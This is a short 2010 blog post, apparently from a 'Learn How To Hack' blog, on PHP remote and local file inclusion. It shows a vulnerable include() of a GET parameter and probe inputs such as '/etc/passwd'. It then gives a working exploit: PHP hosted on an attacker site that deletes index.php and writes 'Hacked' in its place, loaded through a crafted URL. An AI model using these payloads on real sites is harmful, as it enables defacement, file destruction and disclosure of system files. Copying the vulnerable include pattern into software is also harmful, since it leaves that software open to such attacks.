Learn How To Hack: RFI/LFI (Remote/Local File Include)

Saturday, May 29, 2010

RFI/LFI (Remote/Local File Include)

Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)

PHP Code:
$page = $_GET['p'];

if (isset($page)) {

    include($page);

} else {

    include("home.php");

}?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
unlink("index.php");system("echo Hacked > index.php");?>

and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.

Learn How To Hack

Translate This Blog

Followers

About Me

Saturday, May 29, 2010

RFI/LFI (Remote/Local File Include)

No comments:

Post a Comment

Friends Hide Your IP

Search This Blog

Blog Archive